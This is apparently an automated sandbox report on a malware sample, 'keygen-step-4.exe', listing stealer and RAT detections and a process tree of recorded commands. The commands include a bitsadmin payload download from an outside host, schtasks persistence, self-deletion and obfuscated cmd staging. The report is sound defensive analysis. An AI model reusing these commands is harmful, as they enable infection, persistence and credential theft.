Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1804s
  • max time network
    1441s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 55 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 32 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2768
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2660
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2460
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2424
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1764
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1344
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1296
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1136
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1096
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:932
                      • C:\Users\Admin\AppData\Roaming\gwjrfur
                        C:\Users\Admin\AppData\Roaming\gwjrfur
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2824
                        • C:\Users\Admin\AppData\Roaming\gwjrfur
                          C:\Users\Admin\AppData\Roaming\gwjrfur
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:1032
                      • C:\Users\Admin\AppData\Roaming\gwjrfur
                        C:\Users\Admin\AppData\Roaming\gwjrfur
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:3516
                        • C:\Users\Admin\AppData\Roaming\gwjrfur
                          C:\Users\Admin\AppData\Roaming\gwjrfur
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          PID:5972
                      • C:\Windows\system32\rundll32.exe
                        C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                        2⤵
                        • Windows security modification
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:6324
                      • C:\Users\Admin\AppData\Roaming\gwjrfur
                        C:\Users\Admin\AppData\Roaming\gwjrfur
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:6320
                        • C:\Users\Admin\AppData\Roaming\gwjrfur
                          C:\Users\Admin\AppData\Roaming\gwjrfur
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          PID:5476
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:1004
                      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                        1⤵
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:800
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:412
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                            3⤵
                              PID:1860
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2224
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3848
                            • C:\Users\Admin\AppData\Local\Temp\is-67183.tmp\Install.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-67183.tmp\Install.tmp" /SL5="$501A4,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1860
                              • C:\Users\Admin\AppData\Local\Temp\is-N8G4H.tmp\Ultra.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-N8G4H.tmp\Ultra.exe" /S /UID=burnerch1
                                4⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:3604
                                • C:\Users\Admin\AppData\Local\Temp\29-aba0f-895-ed898-96893c064193c\Nudalevuqo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\29-aba0f-895-ed898-96893c064193c\Nudalevuqo.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3872
                                • C:\Users\Admin\AppData\Local\Temp\d3-1a887-9c5-f8190-ad8ffc7dc0ebf\Gepyshyxeso.exe
                                  "C:\Users\Admin\AppData\Local\Temp\d3-1a887-9c5-f8190-ad8ffc7dc0ebf\Gepyshyxeso.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:3424
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fkrmnrvq.s0e\KiffMainE1.exe & exit
                                    6⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:5648
                                    • C:\Users\Admin\AppData\Local\Temp\fkrmnrvq.s0e\KiffMainE1.exe
                                      C:\Users\Admin\AppData\Local\Temp\fkrmnrvq.s0e\KiffMainE1.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:6280
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\imsdyl4t.dzz\001.exe & exit
                                    6⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:6224
                                    • C:\Users\Admin\AppData\Local\Temp\imsdyl4t.dzz\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\imsdyl4t.dzz\001.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:6488
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lwggecdf.tpo\installer.exe /qn CAMPAIGN="654" & exit
                                    6⤵
                                      PID:4144
                                      • C:\Users\Admin\AppData\Local\Temp\lwggecdf.tpo\installer.exe
                                        C:\Users\Admin\AppData\Local\Temp\lwggecdf.tpo\installer.exe /qn CAMPAIGN="654"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Modifies system certificate store
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5140
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lwggecdf.tpo\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lwggecdf.tpo\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620038505 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                          8⤵
                                            PID:6776
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xwm00j4c.jzk\gpooe.exe & exit
                                        6⤵
                                          PID:4628
                                          • C:\Users\Admin\AppData\Local\Temp\xwm00j4c.jzk\gpooe.exe
                                            C:\Users\Admin\AppData\Local\Temp\xwm00j4c.jzk\gpooe.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:4780
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:4884
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:4456
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:840
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:7112
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fddftbql.vor\google-game.exe & exit
                                            6⤵
                                              PID:5344
                                              • C:\Users\Admin\AppData\Local\Temp\fddftbql.vor\google-game.exe
                                                C:\Users\Admin\AppData\Local\Temp\fddftbql.vor\google-game.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:6588
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                  8⤵
                                                  • Loads dropped DLL
                                                  PID:6980
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qtwkvbhb.io1\huesaa.exe & exit
                                              6⤵
                                                PID:6704
                                                • C:\Users\Admin\AppData\Local\Temp\qtwkvbhb.io1\huesaa.exe
                                                  C:\Users\Admin\AppData\Local\Temp\qtwkvbhb.io1\huesaa.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:6904
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:4516
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                      PID:3976
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:6812
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5316
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gn4g0oi0.3zy\askinstall39.exe & exit
                                                  6⤵
                                                    PID:5740
                                                    • C:\Users\Admin\AppData\Local\Temp\gn4g0oi0.3zy\askinstall39.exe
                                                      C:\Users\Admin\AppData\Local\Temp\gn4g0oi0.3zy\askinstall39.exe
                                                      7⤵
                                                        PID:6288
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                          8⤵
                                                            PID:2696
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              9⤵
                                                              • Kills process with taskkill
                                                              PID:5188
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yap5zgm5.w35\setup.exe & exit
                                                        6⤵
                                                          PID:5040
                                                          • C:\Users\Admin\AppData\Local\Temp\yap5zgm5.w35\setup.exe
                                                            C:\Users\Admin\AppData\Local\Temp\yap5zgm5.w35\setup.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:6700
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yap5zgm5.w35\setup.exe"
                                                              8⤵
                                                                PID:4420
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                  9⤵
                                                                  • Runs ping.exe
                                                                  PID:4972
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qhiwy5ku.3f3\y1.exe & exit
                                                            6⤵
                                                              PID:5608
                                                              • C:\Users\Admin\AppData\Local\Temp\qhiwy5ku.3f3\y1.exe
                                                                C:\Users\Admin\AppData\Local\Temp\qhiwy5ku.3f3\y1.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:5752
                                                                • C:\Users\Admin\AppData\Local\Temp\RBBnumWYZx.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\RBBnumWYZx.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Modifies system certificate store
                                                                  PID:5088
                                                                  • C:\Users\Admin\AppData\Roaming\1620297932051.exe
                                                                    "C:\Users\Admin\AppData\Roaming\1620297932051.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620297932051.txt"
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    PID:4140
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RBBnumWYZx.exe"
                                                                    9⤵
                                                                      PID:4904
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping 127.0.0.1 -n 3
                                                                        10⤵
                                                                        • Runs ping.exe
                                                                        PID:6632
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\qhiwy5ku.3f3\y1.exe"
                                                                    8⤵
                                                                      PID:7128
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /T 10 /NOBREAK
                                                                        9⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:4984
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\af21mbfc.qnq\Setup_v3.exe & exit
                                                                  6⤵
                                                                    PID:7020
                                                                    • C:\Users\Admin\AppData\Local\Temp\af21mbfc.qnq\Setup_v3.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\af21mbfc.qnq\Setup_v3.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:488
                                                                      • C:\Windows\SysWOW64\at.exe
                                                                        "C:\Windows\System32\at.exe"
                                                                        8⤵
                                                                          PID:5352
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                          8⤵
                                                                            PID:4212
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\System32\cmd.exe
                                                                              9⤵
                                                                                PID:5832
                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                  findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                                  10⤵
                                                                                    PID:5840
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                    Fessura.exe.com Z
                                                                                    10⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:364
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                                      11⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5432
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                        12⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:6376
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                        12⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5224
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping 127.0.0.1 -n 30
                                                                                    10⤵
                                                                                    • Runs ping.exe
                                                                                    PID:7092
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                8⤵
                                                                                  PID:4732
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\siwda1sb.mdy\toolspab1.exe & exit
                                                                              6⤵
                                                                                PID:4860
                                                                                • C:\Users\Admin\AppData\Local\Temp\siwda1sb.mdy\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\siwda1sb.mdy\toolspab1.exe
                                                                                  7⤵
                                                                                    PID:424
                                                                                    • C:\Users\Admin\AppData\Local\Temp\siwda1sb.mdy\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\siwda1sb.mdy\toolspab1.exe
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5440
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f1hve2y5.zew\005.exe & exit
                                                                                  6⤵
                                                                                    PID:5076
                                                                                    • C:\Users\Admin\AppData\Local\Temp\f1hve2y5.zew\005.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\f1hve2y5.zew\005.exe
                                                                                      7⤵
                                                                                        PID:5092
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\laoevuz2.sb4\SunLabsPlayer.exe /S & exit
                                                                                      6⤵
                                                                                        PID:6500
                                                                                        • C:\Users\Admin\AppData\Local\Temp\laoevuz2.sb4\SunLabsPlayer.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\laoevuz2.sb4\SunLabsPlayer.exe /S
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in Program Files directory
                                                                                          PID:6908
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:6268
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:4288
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3976
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:4164
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:4192
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:6008
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                      • Checks for any installed AV software in registry
                                                                                                      PID:6784
                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                      8⤵
                                                                                                      • Download via BitsAdmin
                                                                                                      PID:3372
                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:5004
                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4788
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:5604
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:5184
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                          8⤵
                                                                                                            PID:712
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:7148
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:4652
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                                8⤵
